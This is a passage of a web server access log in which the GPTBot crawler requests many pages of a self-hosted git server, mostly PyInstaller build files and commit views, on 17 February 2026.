like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20130] [Gzip 9.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4541] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10416] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:14:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16633] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:14:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23063] [Gzip 19.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:14:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14232] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10955] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20143] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20146] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6288] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14135] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:14:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14296] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:14:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 9887] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:14:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 14102] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:14:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" [Client 74.7.227.38] [Length 8077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:14:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10212] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10213] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599824] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23486] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23483] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10954] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16631] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:14:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13813] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:14:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fasset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 23185] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:14:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" -[17/Feb/2026:14:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" -[17/Feb/2026:14:53:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues/new" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:14:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues/new" -[17/Feb/2026:14:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects?q=&sort=recentupdate&state=open" [Client 74.7.227.38] [Length 7795] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/projects" -[17/Feb/2026:14:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599833] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:14:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10464] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 11753] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" -[17/Feb/2026:14:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" [Client 74.7.227.38] [Length 9924] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 